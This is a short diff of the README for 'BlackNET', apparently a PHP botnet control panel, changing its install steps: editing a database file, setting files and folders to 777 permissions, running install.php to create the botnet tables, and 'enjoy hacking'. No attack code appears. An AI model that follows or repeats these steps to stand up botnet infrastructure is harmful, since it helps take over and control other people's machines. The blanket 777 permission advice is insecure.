xdep/BlackNET/README.md

 3. Extract it
 4. Go to PHPMyAdmin
 5. Create a database with any name you want
-6. Change the data in config.php
+6. Change the data in classes/database.php
 7. Change files and folders permission to 777 [connection.php,sendcommand.php,receive.php,Clients Folder]
-8. Go to db.php to create the botnet tables automatically
+8. Go to install.php to create the botnet tables automatically
-9. Go to register.php then create a new account
-10. Enter you network and enjoy hacking
+9. Enter you network and enjoy hacking

 ## Screenshot
 ![Image of the interface](https://c.top4top.net/p_110481bbz1.png)